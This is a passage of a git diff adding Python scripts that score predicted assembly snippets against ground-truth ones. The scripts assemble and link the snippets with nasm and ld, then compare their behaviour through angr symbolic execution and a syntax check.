PR_PP.obj 2>> tempFilePR_PP.txt") + + #Controllo se .asm fa riferimento ad un'architettura 64bit + if(os.stat("tempFilePR_PP.txt").st_size != 0): + + #Lettura del contenuto del file temporaneo e conversione in lista di output + + output_NASMcompiler = open(output_dir+"/tempFilePR_PP.txt", 'r') + list_output_NASMcompiler = output_NASMcompiler.readlines() + output_NASMcompiler.close() + + #Si itera sulla lista di output + + for k in range(len(list_output_NASMcompiler)): + + #Conversione in stringa del k-esimo output e conversione in lista splittando con ' ' + + str_output_NASMcompiler = str(list_output_NASMcompiler[k]) + list_splitted_output_NASMcompiler = str_output_NASMcompiler.split(' ') + + #Si verifica che non sia una warning o un simbolo non definito. + #In caso contrario, si setta la variabile di controllo a True + + if(list_splitted_output_NASMcompiler[2] == "symbol"): + if(list_splitted_output_NASMcompiler[4] == "not"): + if(list_splitted_output_NASMcompiler[5] == "defined\n"): + str_symbol = list_splitted_output_NASMcompiler[3] + str_symbol = str_symbol.replace("'","") + str_symbol = str_symbol[1:] + list_symbolsPR.append(str_symbol) + + ######################################################################## + + if(len(list_symbolsGT) == len(list_symbolsPR)): + + for p in range(len(list_symbolsGT)): + if(list_symbolsGT[p] == list_symbolsPR[p] or + "_"+list_symbolsGT[p] == list_symbolsPR[p] or + list_symbolsGT[p] == "_"+list_symbolsPR[p]): + changeScore = False + else: + changeScore = True + else: + changeScore = True + + + if os.path.isfile(output_dir + "/tempFileGT_PP.txt"): + os.remove(output_dir + "/tempFileGT_PP.txt") + + if os.path.isfile(output_dir + "/GT_PP.obj"): + os.remove(output_dir + "/GT_PP.obj") + + if os.path.isfile(output_dir + "/tempFilePR_PP.txt"): + os.remove(output_dir + "/tempFilePR_PP.txt") + + if os.path.isfile(output_dir + "/PR_PP.obj"): + os.remove(output_dir + "/PR_PP.obj") + + if os.path.isfile(output_dir + "/GT_PP.asm"): + os.remove(output_dir + "/GT_PP.asm") + + if os.path.isfile(output_dir + "/PR_PP.asm"): + os.remove(output_dir + "/PR_PP.asm") + + return changeScore + +def postProcessingL(str_GT, str_PR, output_dir): + + changeScore = False + + checkGTSymbols = True + checkPRSymbols = True + + interrupt = False + + fil_str_gt = str_GT.replace("[", " ").replace("]"," ").replace(",", " ").replace("+"," ").replace("-"," ").replace(" "," ") + fil_str_pr = str_PR.replace("[", " ").replace("]"," ").replace(",", " ").replace("+"," ").replace("-"," ").replace(" "," ") + + list_fil_str_gt = fil_str_gt.split(" ") + list_fil_str_pr = fil_str_pr.split(" ") + + listSymExeSymbols = ["eax", "rax", "ax", "ah", "al", + "ebx", "rbx", "bx", "bh", "bl", + "ecx", "rcx", "cx", "ch", "cl", + "edx", "rdx", "dx", "dh", "dl", + "esp", "rsp", "sp", "spl", + "edi", "rdi", "di", "dil", + "esi", "rsi", "si", "sil", + "ebp", "rbp", "bp", "bpl", + "push", "pop"] + + checkGTSymbols = any(item in list_fil_str_gt for item in listSymExeSymbols) + checkPRSymbols = any(item in list_fil_str_pr for item in listSymExeSymbols) + + ###Gestione interruzioni + + addrintGT = "" + addrintPR = "" + addrintGTclean = "" + addrintPRclean = "" + + + list_snippetsGT_spllited_by_backslash = [] + list_snippetsGT_spllited_by_backslash = str_GT.split('\\n ') + + for j in range(len(list_snippetsGT_spllited_by_backslash)): + list_snippetsGT_spllited_by_backslash[j] = list_snippetsGT_spllited_by_backslash[j].replace('\\', '') + + for k in range(len(list_snippetsGT_spllited_by_backslash)): + + if(str(list_snippetsGT_spllited_by_backslash[k]).split(" ")[0] == "int"): + addrintGT = str(list_snippetsGT_spllited_by_backslash[k]).split(" ")[1] + if(addrintGT[:2] == '0x'): + addrintGTclean = addrintGT.replace("0x","") + elif(addrintGT[-1:] == 'h'): + addrintGTclean = addrintGT.replace("h","") + + list_snippetsPR_spllited_by_backslash = [] + list_snippetsPR_spllited_by_backslash = str_PR.split('\\n ') + + for j in range(len(list_snippetsPR_spllited_by_backslash)): + list_snippetsPR_spllited_by_backslash[j] = list_snippetsPR_spllited_by_backslash[j].replace('\\', '') + + for k in range(len(list_snippetsPR_spllited_by_backslash)): + + if(str(list_snippetsPR_spllited_by_backslash[k]).split(" ")[0] == "int"): + addrintPR = str(list_snippetsPR_spllited_by_backslash[k]).split(" ")[1] + if(addrintPR[:2] == '0x'): + addrintPRclean = addrintPR.replace("0x","") + elif(addrintPR[-1:] == 'h'): + addrintPRclean = addrintPR.replace("h","") + + if(addrintGTclean != "" or addrintPRclean != ""): + + interrupt = True + + if(addrintGTclean != addrintPRclean): + print("changeScore") + changeScore = True + else: + changeScore = False + + ################### + + if(interrupt == False): + + if(checkGTSymbols == True and checkPRSymbols == True): + + changeScore = False + + else: + + list_str_GT = str_GT.split(" ") + list_str_PR = str_PR.split(" ") + + if(len(list_str_GT) == len(list_str_PR)): + + for l in range(len(list_str_GT)): + + if(list_str_GT[l] != list_str_PR[l] and "_"+list_str_GT[l] != list_str_PR[l] and list_str_GT[l] != "_"+list_str_PR[l]): + changeScore = True + + else: + changeScore = True + + return changeScore + +def verifySND(nameEXE, str_symbol, list_snippetsGR_spllited_by_backslash, elf64, output_dir): + + error = False + + if os.path.isfile(output_dir + "/tempFile.txt"): + os.remove(output_dir + "/tempFile.txt") + + os.chdir(output_dir) + if(elf64 == False): + os.system("nasm -f elf32 "+ nameEXE + ".asm -o "+ nameEXE +".obj 2>> tempFile.txt") + else: + os.system("nasm -f elf64 "+ nameEXE + ".asm -o "+ nameEXE +".obj 2>> tempFile.txt") + + if(os.stat("tempFile.txt").st_size == 0): + + if(elf64 == False): + os.system("ld -m i386pe -o "+ nameEXE + ".exe "+ nameEXE +".obj 2>> debugObj.txt") + else: + os.system("ld -o "+ nameEXE + ".exe "+ nameEXE +".obj 2>> debugObj.txt") + + if(os.stat("debugObj.txt").st_size != 0): + + os.remove(output_dir + "/"+ nameEXE + ".asm") + + os.remove(output_dir + "/debugObj.txt") + + if os.path.isfile(output_dir + "/tempFile.txt"): + os.remove(output_dir + "/tempFile.txt") + + with open(output_dir + '/'+ nameEXE +'.txt', 'w') as f: + + f.write('section .data') + f.write('\n\n') + f.write(str_symbol + " equ 0x42") + f.write("\n") + f.write('myExitAddr db 0x56') + f.write('\n\n') + f.write('section .text') + f.write('\n\n') + f.write('global my_start') + f.write('\n\n') + f.write('my_start:') + f.write('\n\n') + + for z in range(len(list_snippetsGR_spllited_by_backslash)): + f.write(" "+list_snippetsGR_spllited_by_backslash[z]) + f.write("\n") + + f.write(" jmp myExitAddr") + f.close() + + p = Path(output_dir + '/'+ nameEXE +'.txt') + p.rename(p.with_suffix('.asm')) + + if(elf64 == False): + os.system("nasm -f elf32 "+ nameEXE + ".asm -o "+ nameEXE +".obj 2>> tempFile1.txt") + else: + os.system("nasm -f elf64 "+ nameEXE + ".asm -o "+ nameEXE +".obj 2>> tempFile1.txt") + + if(os.stat("tempFile1.txt").st_size != 0): + error = True + else: + + if(elf64 == False): + os.system("ld -m i386pe -o "+ nameEXE + ".exe "+ nameEXE +".obj 2>> debugObj1.txt") + else: + os.system("ld -o "+ nameEXE + ".exe "+ nameEXE +".obj 2>> debugObj1.txt") + + if(os.stat("debugObj1.txt").st_size != 0): + error = True + + if os.path.isfile(output_dir + "/tempFile1.txt"): + os.remove(output_dir + "/tempFile1.txt") + + if os.path.isfile(output_dir + "/debugObj1.txt"): + os.remove(output_dir + "/debugObj1.txt") + + else: + error = True + + return error + +def genEXE(snippet, nameEXE, output_dir): + + esecuzioneTerminata = True + + list_snippetsGR_spllited_by_backslash = [] + list_snippetsGR_spllited_by_backslash = snippet.split('\\n ') + + for j in range(len(list_snippetsGR_spllited_by_backslash)): + list_snippetsGR_spllited_by_backslash[j] = list_snippetsGR_spllited_by_backslash[j].replace('\\', '') + + #Creazione scrittura su un file di testo e conversione a .asm + + with open(output_dir + '/'+ nameEXE +'.txt', 'w') as f: + + f.write('section .data') + f.write('\n\n') + f.write('myExitAddr db 0x56') + f.write('\n\n') + f.write('section .text') + f.write('\n\n') + f.write('global my_start') + f.write('\n\n') + f.write('my_start:') + f.write('\n\n') + + for z in range(len(list_snippetsGR_spllited_by_backslash)): + if(str(list_snippetsGR_spllited_by_backslash[z]).split(" ")[0] != "int"): + f.write(" "+list_snippetsGR_spllited_by_backslash[z]) + f.write("\n") + + f.write(" jmp myExitAddr") + f.close() + + p = Path(output_dir + '/'+ nameEXE +'.txt') + p.rename(p.with_suffix('.asm')) + + elf64 = False + + #Lancio del compilatore da shell (l'output è salvato in un file .txt temporaneo) + os.chdir(output_dir) + os.system("nasm -f elf32 "+ nameEXE + ".asm -o "+ nameEXE +".obj 2>> tempFile.txt") + + #Controllo se .asm fa riferimento ad un'architettura 64bit + if(os.stat("tempFile.txt").st_size != 0): + + output_NASMcompiler = open(output_dir+"/tempFile.txt", 'r') + str_output_NASMcompiler = output_NASMcompiler.read() + output_NASMcompiler.close() + + str_output_NASMcompiler = str_output_NASMcompiler.split(' ', 1)[1] + + if(str_output_NASMcompiler.replace("\n","") == "error: instruction not supported in 32-bit mode"): + elf64 = True + + #os.remove(output_dir + "/tempFile.txt") + + os.system("nasm -f elf64 "+ nameEXE + ".asm -o "+ nameEXE +".obj 2>> tempFile.txt") + + if(os.stat("tempFile.txt").st_size == 0): + + os.chdir(output_dir) + if(elf64 == False): + os.system("ld -m i386pe -o "+ nameEXE + ".exe "+ nameEXE +".obj 2>> debugObj.txt") + else: + os.system("ld -o "+ nameEXE + ".exe "+ nameEXE +".obj 2>> debugObj.txt") + + #debug.obj + if(os.stat("debugObj.txt").st_size != 0): + # debugObj = open(output_dir +"/debugObj.txt", 'r') + # print("\n") + # print(i) + # print(debugObj.read()) + # prova.append(str_output_NASMcompiler) + # debugObj.close() + esecuzioneTerminata = False + + else: + + #Lettura del contenuto del file temporaneo e conversione in lista di output + + output_NASMcompiler = open(output_dir+"/tempFile.txt", 'r') + list_output_NASMcompiler = output_NASMcompiler.readlines() + output_NASMcompiler.close() + + #Variabile booleana di controllo + error = False + + #Si itera sulla lista di output + + for k in range(len(list_output_NASMcompiler)): + + #Conversione in stringa del k-esimo output e conversione in lista splittando con ' ' + + str_output_NASMcompiler = str(list_output_NASMcompiler[k]) + list_splitted_output_NASMcompiler = str_output_NASMcompiler.split(' ') + + #Si verifica che non sia una warning o un simbolo non definito. + #In caso contrario, si setta la variabile di controllo a True + + if(list_splitted_output_NASMcompiler[1] != "warning:"): + if(list_splitted_output_NASMcompiler[2] == "symbol"): + if(list_splitted_output_NASMcompiler[4] == "not"): + if(list_splitted_output_NASMcompiler[5] != "defined\n"): + error = True + else: + str_symbol = list_splitted_output_NASMcompiler[3] + str_symbol = str_symbol.replace("'","") + str_symbol = str_symbol[1:] + with open(output_dir + "/"+nameEXE+".asm", "a+") as f: + f.write('\n') + f.write(str_symbol + ":") + f.write('\n\n') + f.write('inc eax') + f.write('\n\n') + f.write('jmp myExitAddr') + f.close() + error = verifySND(nameEXE, str_symbol, list_snippetsGR_spllited_by_backslash, elf64, output_dir) + else: + error = True + else : + error = True + + #Verifica della presenza di errori e calcolo dei risultati + + if(error == False): + + os.chdir(output_dir) + + if(elf64 == False): + os.system("nasm -f elf32 "+ nameEXE + ".asm -o "+ nameEXE +".obj 2>> tempFile.txt") + + #Controllo nuovamente se .asm fa riferimento ad un'architettura 64bit + if(os.stat("tempFile.txt").st_size != 0): + + output_NASMcompiler = open(output_dir+"/tempFile.txt", 'r') + str_output_NASMcompiler = output_NASMcompiler.read() + output_NASMcompiler.close() + + str_output_NASMcompiler = str_output_NASMcompiler.split(' ', 1)[1] + + if(str_output_NASMcompiler == "error: instruction not supported in 32-bit mode\n"): + + os.remove(output_dir + "/tempFile.txt") + os.remove(output_dir + "/debugObj.txt") + + os.system("nasm -f elf64 "+ nameEXE + ".asm -o "+ nameEXE +".obj 2>> tempFile.txt") + else: + os.system("nasm -f elf64 "+ nameEXE + ".asm -o "+ nameEXE +".obj 2>> tempFile.txt") + + if(elf64 == False): + os.system("ld -m i386pe -o "+ nameEXE + ".exe "+ nameEXE +".obj 2>> debugObj.txt") + else: + os.system("ld -o "+ nameEXE + ".exe "+ nameEXE +".obj 2>> debugObj.txt") + + #debug.obj + if(os.stat("debugObj.txt").st_size != 0): + # debugObj = open(output_dir +"/debugObj.txt", 'r') + # print("\n") + # print(i) + # print(debugObj.read()) + # prova.append(str_output_NASMcompiler) + # debugObj.close() + esecuzioneTerminata = False + else: + #print("\n") + #print(snippet) + esecuzioneTerminata = False + + #Chiusura e rimozione del file temporaneo + output_NASMcompiler.close() + + #Rimozione dei file precedentemente creati + # if os.path.isfile(output_dir + "/"+ nameEXE +".asm"): + # os.remove(output_dir + "/"+ nameEXE +".asm") + + # if os.path.isfile(output_dir + "/"+ nameEXE +".obj"): + # os.remove(output_dir + "/"+ nameEXE +".obj") + + # if os.path.isfile(output_dir + "/tempFile.txt"): + # os.remove(output_dir + "/tempFile.txt") + + # if os.path.isfile(output_dir + "/debugObj.txt"): + # os.remove(output_dir + "/debugObj.txt") + + return esecuzioneTerminata + +def print_state(simgr): + + for i in range(len(simgr.active)): + print("RAMO '" + str(i+1) +"': "+ str(simgr.active[i])) + print("Contenuto di eax: " + str(simgr.active[i].regs.eax)) + print("Contenuto di ecx: " + str(simgr.active[i].regs.ecx)) + print("Contenuto di esp: " + str(simgr.active[i].regs.esp)) + print("Contenuto di esi: " + str(simgr.active[i].regs.esi)) + print("Contenuto di ebp: " + str(simgr.active[i].regs.ebp)) + print("Contenuto di edi: " + str(simgr.active[i].regs.edi)) + print("Flags cc_op: " + str(simgr.active[i].regs.cc_op)) + print("Flags cc_dep1: " + str(simgr.active[i].regs.cc_dep1)) + print("Flags cc_dep2: " + str(simgr.active[i].regs.cc_dep2)) + print("Constraint: "+ str(simgr.active[i].solver.constraints)) + print("History: "+ str(simgr.active[i].history)) + print("\n") + +def stepAll(simgr, MaxStep): + + notFinished = True + count = 0 + + while(notFinished and count < MaxStep): + + count = count + 1 + + result = all(str(element) == '' for element in simgr.active) + + if(result): + notFinished = False + else: + simgr.step() + +def checkSimilarity(simgr1, simgr2, state1, state2, initialSP_simgr1, initialSP_simgr2): + + check = True + + for i in range(len(simgr2.active)): + + listRegistersAndConstraints2 = [] + listFlags2 = [] + listStack2 = [] + + for k in range(len(simgr2.active[i].solver.constraints)): + listRegistersAndConstraints2.append(simgr2.active[i].solver.constraints[k]) + + if(state1.arch.name == 'X86' and state2.arch.name == 'X86'): + listRegistersAndConstraints2.append(simgr2.active[i].regs.eax) + listRegistersAndConstraints2.append(simgr2.active[i].regs.ebx) + listRegistersAndConstraints2.append(simgr2.active[i].regs.ecx) + listRegistersAndConstraints2.append(simgr2.active[i].regs.edx) + listRegistersAndConstraints2.append(simgr2.active[i].regs.esi) + listRegistersAndConstraints2.append(simgr2.active[i].regs.ebp) + listRegistersAndConstraints2.append(simgr2.active[i].regs.edi) + listRegistersAndConstraints2.append(simgr2.active[i].regs.esp) + listFlags2.append(simgr2.active[i].regs.cc_dep1) + listFlags2.append(simgr2.active[i].regs.cc_dep2) + + else: + listRegistersAndConstraints2.append(simgr2.active[i].regs.rax) + listRegistersAndConstraints2.append(simgr2.active[i].regs.rbx) + listRegistersAndConstraints2.append(simgr2.active[i].regs.rcx) + listRegistersAndConstraints2.append(simgr2.active[i].regs.rdx) + listRegistersAndConstraints2.append(simgr2.active[i].regs.rsi) + listRegistersAndConstraints2.append(simgr2.active[i].regs.rbp) + listRegistersAndConstraints2.append(simgr2.active[i].regs.rdi) + listRegistersAndConstraints2.append(simgr2.active[i].regs.rsp) + listFlags2.append(simgr2.active[i].regs.cc_dep1) + listFlags2.append(simgr2.active[i].regs.cc_dep2) + + + listComparisonRegisterAndConstraints = [] + listComparisonFlag = [] + listComparisonStack = [] + + finalSP_simgr2 = simgr2.active[i].regs.esp + + if(finalSP_simgr2.symbolic == False): + + finalSP_simgr2 = ((str(finalSP_simgr2).split(" "))[1].replace("]", "").replace(">", "")) + + if(initialSP_simgr2 != finalSP_simgr2): + + maxSPIndex = max(int(initialSP_simgr2,0), int(finalSP_simgr2,0)) + minSPIndex = min(int(initialSP_simgr2,0), int(finalSP_simgr2,0)) + + outStack = 0 + + for h in range(minSPIndex, maxSPIndex+1): + outStack = outStack + 1 + listStack2.append(simgr2.active[i].mem[h].int.resolved) + if(outStack > 1000): + break + + for j in range(len(simgr1.active)): + + listRegistersAndConstraints1 = [] + listFlags1 = [] + listStack1 = [] + + for l in range(len(simgr1.active[j].solver.constraints)): + listRegistersAndConstraints1.append(simgr1.active[j].solver.constraints[l]) + + if(state1.arch.name == 'X86' and state2.arch.name == 'X86'): + listRegistersAndConstraints1.append(simgr1.active[j].regs.eax) + listRegistersAndConstraints1.append(simgr1.active[j].regs.ebx) + listRegistersAndConstraints1.append(simgr1.active[j].regs.ecx) + listRegistersAndConstraints1.append(simgr1.active[j].regs.edx) + listRegistersAndConstraints1.append(simgr1.active[j].regs.esi) + listRegistersAndConstraints1.append(simgr1.active[j].regs.ebp) + listRegistersAndConstraints1.append(simgr1.active[j].regs.edi) + listRegistersAndConstraints1.append(simgr1.active[j].regs.esp) + listFlags1.append(simgr1.active[j].regs.cc_dep1) + listFlags1.append(simgr1.active[j].regs.cc_dep2) + + else: + listRegistersAndConstraints1.append(simgr1.active[j].regs.rax) + listRegistersAndConstraints1.append(simgr1.active[j].regs.rbx) + listRegistersAndConstraints1.append(simgr1.active[j].regs.rcx) + listRegistersAndConstraints1.append(simgr1.active[j].regs.rdx) + listRegistersAndConstraints1.append(simgr1.active[j].regs.rsi) + listRegistersAndConstraints1.append(simgr1.active[j].regs.rbp) + listRegistersAndConstraints1.append(simgr1.active[j].regs.rdi) + listRegistersAndConstraints1.append(simgr1.active[j].regs.rsp) + listFlags1.append(simgr1.active[j].regs.cc_dep1) + listFlags1.append(simgr1.active[j].regs.cc_dep2) + + finalSP_simgr1 = simgr1.active[j].regs.esp + + if(finalSP_simgr1.symbolic == False): + + finalSP_simgr1 = ((str(finalSP_simgr1).split(" "))[1].replace("]", "").replace(">", "")) + + if(initialSP_simgr1 != finalSP_simgr1): + + maxSPIndex = max(int(initialSP_simgr1,0), int(finalSP_simgr1,0)) + minSPIndex = min(int(initialSP_simgr1,0), int(finalSP_simgr1,0)) + + outStack = 0 + + for h in range(minSPIndex, maxSPIndex+1): + outStack = outStack + 1 + listStack1.append(simgr1.active[j].mem[h].int.resolved) + if(outStack > 1000): + break + + listComparisonRegisterAndConstraints.append(collections.Counter(listRegistersAndConstraints1) == collections.Counter(listRegistersAndConstraints2)) + listComparisonFlag.append(collections.Counter(listFlags1) == collections.Counter(listFlags2)) + listComparisonStack.append(collections.Counter(listStack1) == collections.Counter(listStack2)) + + if(not(True in listComparisonRegisterAndConstraints) or + not(True in listComparisonFlag) or + not(True in listComparisonStack)): + check = False + break + + return check + +def semantic_similarity(dir1, dir2): + + proj1 = angr.Project(dir1) + proj2 = angr.Project(dir2) + + state1 = proj1.factory.entry_state() + state2 = proj2.factory.entry_state() + + simgr1 = proj1.factory.simulation_manager() + simgr2 = proj2.factory.simulation_manager() + + #Inizializzazioni in base all'architettura dei due snippet + if(state1.arch.name == 'X86' and state2.arch.name == 'X86'): + + eax = claripy.BVS("eax", 32) + simgr1.active[0].regs.eax = eax + simgr2.active[0].regs.eax = eax + + ebx = claripy.BVS("ebx", 32) + simgr1.active[0].regs.ebx = ebx + simgr2.active[0].regs.ebx = ebx + + ecx = claripy.BVS("ecx", 32) + simgr1.active[0].regs.ecx = ecx + simgr2.active[0].regs.ecx = ecx + + edx = claripy.BVS("edx", 32) + simgr1.active[0].regs.edx = edx + simgr2.active[0].regs.edx = edx + + esi = claripy.BVS("esi", 32) + simgr1.active[0].regs.esi = esi + simgr2.active[0].regs.esi = esi + + ebp = claripy.BVS("ebp", 32) + simgr1.active[0].regs.ebp = ebp + simgr2.active[0].regs.ebp = ebp + + edi = claripy.BVS("edi", 32) + simgr1.active[0].regs.edi = edi + simgr2.active[0].regs.edi = edi + + cc_dep1 = claripy.BVS("cc_dep1", 32) + simgr1.active[0].regs.cc_dep1 = cc_dep1 + simgr2.active[0].regs.cc_dep1 = cc_dep1 + + cc_dep2 = claripy.BVS("cc_dep2", 32) + simgr1.active[0].regs.cc_dep2 = cc_dep2 + simgr2.active[0].regs.cc_dep2 = cc_dep2 + + # cc_op = claripy.BVS("cc_op", 32) + # simgr1.active[0].regs.cc_op = cc_op + # simgr2.active[0].regs.cc_op = cc_op + + else: + + rax = claripy.BVS("rax", 64) + simgr1.active[0].regs.rax = rax + simgr2.active[0].regs.rax = rax + + rbx = claripy.BVS("rbx", 64) + simgr1.active[0].regs.rbx = rbx + simgr2.active[0].regs.rbx = rbx + + rcx = claripy.BVS("rcx", 64) + simgr1.active[0].regs.rcx = rcx + simgr2.active[0].regs.rcx = rcx + + rdx = claripy.BVS("rdx", 64) + simgr1.active[0].regs.rdx = rdx + simgr2.active[0].regs.rdx = rdx + + rsi = claripy.BVS("rsi", 64) + simgr1.active[0].regs.rsi = rsi + simgr2.active[0].regs.rsi = rsi + + rbp = claripy.BVS("rbp", 64) + simgr1.active[0].regs.rbp = rbp + simgr2.active[0].regs.rbp = rbp + + rdi = claripy.BVS("rdi", 64) + simgr1.active[0].regs.rdi = rdi + simgr2.active[0].regs.rdi = rdi + + cc_dep1 = claripy.BVS("cc_dep1", 64) + simgr1.active[0].regs.cc_dep1 = cc_dep1 + simgr2.active[0].regs.cc_dep1 = cc_dep1 + + cc_dep2 = claripy.BVS("cc_dep2", 64) + simgr1.active[0].regs.cc_dep2 = cc_dep2 + simgr2.active[0].regs.cc_dep2 = cc_dep2 + + # cc_op = claripy.BVS("cc_op", 64) + # simgr1.active[0].regs.cc_op = cc_op + # simgr2.active[0].regs.cc_op = cc_op + + initialSP_simgr1 = ((str(simgr1.active[0].regs.esp).split(" "))[1].replace("]", "").replace(">", "")) + initialSP_simgr2 = ((str(simgr2.active[0].regs.esp).split(" "))[1].replace("]", "").replace(">", "")) + + MaxStep = 100 + + #Esecuzione simgr1 + stepAll(simgr1, MaxStep) + #print_state(simgr1) + + #Esecuzione simgr2 + stepAll(simgr2, MaxStep) + #print_state(simgr2) + + #print("Check Constraints: " + str(checkConstraints(simgr1, simgr2))) + #print("Check Registers: " + str(checkRegisters(simgr1, simgr2))) + + if(checkSimilarity(simgr1, simgr2, state1, state2, initialSP_simgr1, initialSP_simgr2) == True): + #print("Similarità semantica verificata") + return True + else: + #print("Similarità semantica non verificata") + return False + +this_directory = os.getcwd() + +root = tk.Tk() +root.withdraw() + +input_file = filedialog.askopenfile(initialdir= os.path.join(this_directory, os.path.join("Output", "Output_Syntactic_Analysis")), + title = "Select the Syntactic Correctness results file") + +output_Folder = "Output_Semantic_Analysis" +output_dir = os.path.join(this_directory, os.path.join("Output", output_Folder)) + +syntactic_results = os.path.join(this_directory, input_file.name) + +data = pd.read_csv(syntactic_results, sep = ";", engine='python') + +#Inizializzazioni +num_semantic_correct = 0 +total = 0 + +list_gt = [] +list_pr = [] + +list_errorGenEXEGT = [] +list_errorGenEXEPR = [] + +score = [] + +nameFile = "_".join((((input_file.name).split("/")[-1]).split(".")[0]).split("_")[3:]) + +results_folder = os.path.join(output_dir, nameFile) + +if not os.path.exists(results_folder): + os.mkdir(results_folder) + +genEXE_folder = os.path.join(results_folder, "GenEXE Errors") + +if not os.path.exists(genEXE_folder): + os.mkdir(genEXE_folder) + +####### Operazioni preliminari ####### + +for i in tqdm(range(data["Ground Truth Snippets"].size)): + + list_gt.append(str(data["Ground Truth Snippets"][i])) + list_pr.append(str(data["Predicted Snippets"][i])) + + if(str(data["Score Syntax"][i]) == "0"): + total = total + 1 + score.append(0) + + elif((str(data["Ground Truth Snippets"][i]) == str(data["Predicted Snippets"][i])) or + (str(data["Ground Truth Snippets"][i]).replace(" ","").replace("\\n", "").replace("\n","") == str(data["Predicted Snippets"][i]).replace(" ","").replace("\\n", "").replace("\n",""))): + num_semantic_correct = num_semantic_correct + 1 + total = total + 1 + + score.append(1) + + else: + + str_snippetGT = str(data["Ground Truth Snippets"][i]) + str_snippetPR = str(data["Predicted Snippets"][i]) + + path = os.path.join(genEXE_folder, "executables") + + if(not(os.path.exists(path))): + os.mkdir(path) + + checkGenEXEGT = genEXE(str_snippetGT, "GT_"+str(i+1), path) + checkGenEXEPR = genEXE(str_snippetPR, "PR_"+str(i+1), path) + + #print(str_snippetGT, " + ", checkGenEXEGT) + #print(str_snippetPR, " + ", checkGenEXEPR) + + + if(checkGenEXEGT == checkGenEXEPR == True): + total = total + 1 + + if(semantic_similarity(path+"/GT_"+str(i+1)+".exe", path+"/PR_"+str(i+1)+".exe") == True): + num_semantic_correct = num_semantic_correct + 1 + score.append(1) + else: + score.append(0) + else: + list_errorGenEXEGT.append(str(data["Ground Truth Snippets"][i])) + list_errorGenEXEPR.append(str(data["Predicted Snippets"][i])) + + if(checkGenEXEGT == False): + score.append("GT: errorGenEXE") + else: + score.append("PR: errorGenEXE") + +dict_ris = {'Ground Truth Snippets' : list_gt, 'Predicted Snippets' : list_pr, 'Score Semantic Equivalence' : score} +df_ris = pd.DataFrame(dict_ris) + +#shutil.rmtree(path, ignore_errors = True) + +print("Start of post-processing operations...") + +for i in tqdm(range(df_ris["Ground Truth Snippets"].size)): + + if(str(df_ris['Score Semantic Equivalence'][i]) == str('1')): + + changeScore = postProcessingSND(str(df_ris['Ground Truth Snippets'][i]), str(df_ris['Predicted Snippets'][i]), output_dir) + + if(changeScore == True): + print(df_ris["Ground Truth Snippets"][i]) + df_ris['Score Semantic Equivalence'][i] = 0 + num_semantic_correct = num_semantic_correct - 1 + +for i in tqdm(range(df_ris["Ground Truth Snippets"].size)): + + if(str(df_ris['Score Semantic Equivalence'][i]) == str('1')): + + changeScore = postProcessingL(str(df_ris['Ground Truth Snippets'][i]), str(df_ris['Predicted Snippets'][i]), output_dir) + + if(changeScore == True): + df_ris['Score Semantic Equivalence'][i] = 0 + num_semantic_correct = num_semantic_correct - 1 + +sum_ris = 0 + +for i in range(df_ris["Ground Truth Snippets"].size): + + if(str(df_ris['Score Semantic Equivalence'][i]) == str('1') or + str(df_ris['Score Semantic Equivalence'][i]) == str('0')): + + sum_ris = sum_ris + int(df_ris['Score Semantic Equivalence'][i]) + +total_size=df_ris["Ground Truth Snippets"].size + +print("\n\n") +print("Semantic Equivalence = " +str((sum_ris/total_size)*100)+"%") + +dict_error = {'Ground Truth Snippets ErrorGENEXE' : list_errorGenEXEGT, 'Predicted Snippets ErrorGENEXE' : list_errorGenEXEPR} +df_error = pd.DataFrame(dict_error) +df_error.to_csv(os.path.join(genEXE_folder, "Errors GenEXE.csv"), index=False, sep = ";") + +df_ris.to_csv(os.path.join(results_folder, "output_semantic_equivalence_"+str(nameFile)+".csv"), index=False, sep = ";") diff --git a/ACCA/syntactic_analysis.py b/ACCA/syntactic_analysis.py new file mode 100644 index 0000000000000000000000000000000000000000..379a6660f54b6b3068ad5e695d5bcc354bf1a81a --- /dev/null +++ b/ACCA/syntactic_analysis.py @@ -0,0 +1,272 @@ +import os +import pandas as pd +from pathlib import Path +from tqdm import tqdm +from tkinter import filedialog +import tkinter as tk + +this_directory = os.getcwd() + +dir_Ground_Truth = os.path.join(this_directory, os.path.join("Ground Truth and Predictions", "Ground Truth")) +ground_truth_name = os.listdir(dir_Ground_Truth) +dir_Ground_Truth = os.path.join(dir_Ground_Truth, ground_truth_name[0]) + +dir_Predictions = os.path.join(this_directory, os.path.join("Ground Truth and Predictions", "Predictions")) +output_dir = os.path.join(this_directory, os.path.join("Output", "Output_Syntactic_Analysis")) + +root = tk.Tk() +root.withdraw() + +predictions_File = filedialog.askopenfile(initialdir= dir_Predictions, + title = "Select Predictions File") + +dir_Predictions = os.path.join(dir_Predictions, predictions_File.name) + +matching_GT = 0 + +####### Operazioni preliminari ####### + +#Pulizia delle predizioni + +read_directory = open(dir_Predictions, 'r') + +list_prediction = read_directory.readlines() +list_prediction.pop(len(list_prediction)-1) +list_prediction.pop(0) + +for i in range(len(list_prediction)): + list_prediction[i] = list_prediction[i].replace(" " , "").replace("\"", "") + if(i != ((len(list_prediction))-1)): + list_prediction[i] = list_prediction[i][:-2] + +prediction = pd.DataFrame({"Code": list_prediction}) + +read_directory = open(dir_Ground_Truth, 'r') + +list_ground_truth = read_directory.readlines() + +for i in range(len(list_ground_truth)): + list_ground_truth[i] = list_ground_truth[i].replace("\n" , "") + +ground_truth = pd.DataFrame({"Code": list_ground_truth}) + +#Inizializzazioni + +list_predicted_snippet = [] +list_ground_truth_snippet = [] + +list_output_compiler = [] +num_syntax_correct = 0 +count_matched = 0 +count_no_compiler_error = 0 + +list_predicted_snippet_with_warning = [] +list_output_compiler_with_warning = [] + +list_predicted_snippet_with_symbolNotDef = [] +list_output_compiler_with_symbolNotDef = [] + +list_predicted_snippet_with_errors = [] +list_output_compiler_with_errors = [] + +score = [] +####### Verifica correttezza sintattica ####### + +for i in tqdm(range(prediction.size)): + + list_ground_truth_snippet.append(str(ground_truth["Code"][i])) + list_predicted_snippet.append(str(prediction["Code"][i])) + + if(((str(ground_truth["Code"][i]) == str(prediction["Code"][i])) or + (str(ground_truth["Code"][i]).replace(" ","") == str(prediction["Code"][i]).replace(" ",""))) + and matching_GT != 1): + list_output_compiler.append("Matched with ground truth") + num_syntax_correct = num_syntax_correct + 1 + count_matched = count_matched + 1 + score.append(1) + else: + + str_snippet = str(prediction["Code"][i]) + + list_snippets_spllited_by_backslash = str_snippet.split('\\n ') + + for j in range(len(list_snippets_spllited_by_backslash)): + list_snippets_spllited_by_backslash[j] = list_snippets_spllited_by_backslash[j].replace('\\', '') + + #Creazione scrittura su un file di testo e conversione a .asm + + with open(output_dir + 